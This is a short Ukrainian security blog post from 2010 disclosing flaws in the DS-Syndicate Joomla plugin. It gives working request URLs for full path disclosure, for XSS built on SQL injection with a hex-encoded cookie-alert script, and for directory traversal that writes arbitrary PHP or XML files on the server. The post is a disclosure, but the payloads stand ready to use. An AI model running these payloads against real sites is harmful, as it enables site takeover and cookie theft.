Нові уразливості в DS-Syndicate для Joomla

23:55 22.05.2010

Сьогодні я знайшов нові уразливості в плагіні DS-Syndicate для Joomla - це Full path disclosure, Cross-Site Scripting та Directory Traversal уразливості. Дірки виявив на одному веб сайті, що використовує даний плагін. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в DS-Syndicate для Joomla.

Full path disclosure:

http://site/index2.php?option=ds-syndicate&version=1&feed_id=1%0A1

Хоча дана FPD має місце в тому самому скрипті і тому самому параметрі, але вона виводить трохи більше інформації ніж попередня FPD і проявляється не в одному, а одразу в двох скриптах. Тобто її потрібно виправляти окремо.

XSS (через SQLi + FPD):

http://site/index2.php?option=ds-syndicate&version=1&feed_id=-1+union+select+1,1,1,1,1,0x3C7363726970743E616C65727428646F63756D656E742E636F6F6B6965293C2F7363726970743E,1,1,1,1,1,1,1,1,1,1,1,1,1,1%0A%23

При XSS (через SQLi) код не виконується в браузері (бо виводиться xml), а при XSS (через SQLi + FPD) код виконується в браузері (бо виводиться html). Тільки через SQL Injection неможна провести XSS атаку, тому що код не виконується в браузері, а при використані разом SQLi та FPD можна провести XSS атаку.

Directory Traversal:

Для запису будь-яких файлів, зокрема PHP скриптів, а також для перезапису будь-яких файлів на сервері (при відключених magic quotes):

http://site/index2.php?option=ds-syndicate&version=1&feed_id=/../../../../1.php%00

Файл доступний: http://site/1.php

Для запису xml-файлів - для проведення XSS (через XML) та LFI атак, а також для перезапису будь-яких xml-файлів на сервері:

http://site/index2.php?option=ds-syndicate&version=1&feed_id=/../../../../1

Файл доступний: http://site/1.xml

Для запису PHP скриптів та інших файлів, а також для проведення XSS та LFI атак потрібно використати один з параметрів 2, 3, 6 або 18 SQL запиту.

http://site/index2.php?option=ds-syndicate&version=1&feed_id=-1+union+select+1,0x436F6465,0x436F6465,1,1,0x436F6465,1,1,1,1,1,1,1,1,1,1,1,0x436F6465,1,1%23/../../../../1

Вразливі всі версії DS-Syndicate для Joomla. Зазначу, що розробник плагіна більше його не підтримує, тому користувачам плагіна потрібно виправити його самотужки.


Leave a Reply

You must be logged in to post a comment.